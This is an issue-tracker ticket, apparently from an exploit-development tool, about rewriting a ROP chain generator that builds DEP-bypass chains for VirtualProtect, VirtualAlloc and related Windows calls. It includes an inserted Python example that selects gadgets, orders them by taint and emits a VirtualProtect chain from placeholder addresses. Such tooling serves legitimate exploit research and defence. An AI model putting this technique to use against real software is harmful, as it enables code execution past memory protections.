Feature #156
rewrite rop routine
| Status: | Committed | Start date: | 01 Aug 2011 |
|---|---|---|---|
| Priority: | Normal | Due date: | |
| Assignee: | Peter | % Done: | 100% |
| Category: | - | | |
| Target version: | v1.2 | | |
Description
1. build dictionary with desired register contents for each function
(virtualalloc, virtualprotect, ntsetinformationprocess)
2. build gadgets for each step, with taint list
3. reorder gadgets to satisfy taints
4. build chain, compute compensate and retn offset support at runtime
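The four steps above, worked through as an added Python example (this is not the ticket's generator, just a model of the procedure it describes). The gadget pool, its hypothetical addresses, the per-register layout for the virtualprotect target, the `FILLER` value and the final `pushad; ret` launch gadget are all constructed for illustration. It goes one step beyond the ticket by replaying the finished chain against the gadget model to confirm every register still holds its desired value when the launch gadget runs.

```python
import struct
from typing import Dict, List, Optional, Tuple

FILLER = 0x41414141   # "compensate" value for pops whose result is not needed
WORD = 4


class Gadget:
    def __init__(self, addr: int, text: str, pops: List[str],
                 taints: List[str] = (), retn: int = 0):
        self.addr = addr
        self.text = text
        self.pops = list(pops)        # registers popped, in stack order
        self.taints = set(taints)     # registers destroyed as a side effect
        self.retn = retn              # N of "ret N"; 0 for a plain ret

    def clobbers(self, target: str) -> set:
        """Registers this gadget changes apart from the one it is used to set."""
        return (set(self.pops) | self.taints) - {target}


# Step 1: desired register contents per target function (constructed layout;
# a real generator fills in the API pointer and a writable address at runtime).
TARGETS: Dict[str, Dict[str, int]] = {
    "virtualprotect": {
        "eax": 0x90909090,   # filler
        "ebx": 0x00000201,   # dwSize
        "ecx": 0x0040F000,   # lpflOldProtect (writable address)
        "edx": 0x00000040,   # flNewProtect = PAGE_EXECUTE_READWRITE
        "esi": 0x7C801AD4,   # pointer to VirtualProtect (placeholder)
        "edi": 0x10001070,   # "ret" gadget used as a ROP nop (placeholder)
    },
}

# Constructed gadget pool with hypothetical addresses.
POOL = [
    Gadget(0x10001000, "pop eax; ret", ["eax"]),
    Gadget(0x10001010, "pop ebx; ret", ["ebx"]),
    Gadget(0x10001020, "pop ecx; pop ebx; ret", ["ecx", "ebx"]),
    Gadget(0x10001030, "pop edx; ret 8", ["edx"], retn=8),
    Gadget(0x10001040, "pop esi; xor eax,eax; ret", ["esi"], taints=["eax"]),
    Gadget(0x10001050, "pop edi; ret", ["edi"]),
]
LAUNCH = Gadget(0x10001060, "pushad; ret", [])   # consumes the register state


# Step 2: one gadget per register, preferring the one with the fewest taints.
def select_gadgets(wanted: Dict[str, int], pool: List[Gadget]) -> Dict[str, Gadget]:
    chosen = {}
    for reg in wanted:
        cands = [g for g in pool if reg in g.pops]
        if not cands:
            raise ValueError(f"no gadget sets {reg}")
        chosen[reg] = min(cands, key=lambda g: (len(g.clobbers(reg)), g.retn, g.addr))
    return chosen


# Step 3: order gadgets so each runs before any gadget whose register it
# would clobber (topological sort). A cycle means no order keeps every value.
def order_by_taint(chosen: Dict[str, Gadget]) -> List[Tuple[str, Gadget]]:
    indeg = {r: 0 for r in chosen}
    for r, g in chosen.items():
        for c in g.clobbers(r):
            if c in chosen:
                indeg[c] += 1
    remaining, out = set(chosen), []
    while remaining:
        ready = sorted(r for r in remaining if indeg[r] == 0)
        if not ready:
            raise ValueError("taint cycle among " + ", ".join(sorted(remaining)))
        r = ready[0]
        remaining.remove(r)
        out.append((r, chosen[r]))
        for c in chosen[r].clobbers(r):
            if c in remaining:
                indeg[c] -= 1
    return out


# Step 4: emit the chain. A "ret N" gadget needs N bytes of filler after the
# *next* gadget's address, because that address is popped before ESP += N.
def build_chain(ordered: List[Tuple[str, Gadget]], wanted: Dict[str, int],
                launch: Gadget) -> List[int]:
    chain, pending = [], 0
    for reg, g in ordered + [(None, launch)]:
        chain.append(g.addr)
        chain.extend([FILLER] * (pending // WORD))
        chain.extend(wanted[reg] if p == reg else FILLER for p in g.pops)
        pending = g.retn
    return chain


def generate(wanted: Dict[str, int], pool: List[Gadget], launch: Gadget):
    ordered = order_by_taint(select_gadgets(wanted, pool))
    return ordered, build_chain(ordered, wanted, launch)


def simulate(chain: List[int], gadgets: List[Gadget]) -> Dict[str, Optional[int]]:
    """Replay the chain as the CPU would; None marks a value lost to a side effect."""
    by_addr = {g.addr: g for g in gadgets}
    regs, i, skip = {}, 0, 0
    while i < len(chain):
        g = by_addr[chain[i]]
        i += 1 + skip          # return address popped, then "ret N" discards N bytes
        for reg in g.pops:
            regs[reg] = chain[i]
            i += 1
        for reg in g.taints:
            regs[reg] = None
        skip = g.retn // WORD
    return regs


def to_bytes(chain: List[int]) -> bytes:
    return struct.pack("<%dI" % len(chain), *chain)


if __name__ == "__main__":
    wanted = TARGETS["virtualprotect"]
    ordered, chain = generate(wanted, POOL, LAUNCH)
    for reg, g in ordered:
        print(f"{g.addr:#010x}  {g.text:<28} -> {reg} = {wanted[reg]:#010x}")
    print(f"{LAUNCH.addr:#010x}  {LAUNCH.text}")
    assert simulate(chain, POOL + [LAUNCH]) == wanted
    print(to_bytes(chain).hex())
```

With this pool the taint list forces `pop ecx; pop ebx; ret` ahead of `pop ebx; ret` and `pop esi; xor eax,eax; ret` ahead of `pop eax; ret`, and the two filler dwords that follow the address after `pop edx; ret 8` are the retn-offset compensation from step 4. If two chosen gadgets clobber each other's register, `order_by_taint` raises instead of emitting a chain that silently loses a value.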
History
#1 Updated by Peter almost 2 years ago
- Status changed from New to Committed
- Target version changed from v1.2 to v1.3
- % Done changed from 0 to 100
done
rop generator now produces chains for
- virtualalloc
- virtualprotect
- ntsetinformationprocess
- setprocessdeppolicy
#2 Updated by Peter almost 2 years ago
- Target version changed from v1.3 to v1.2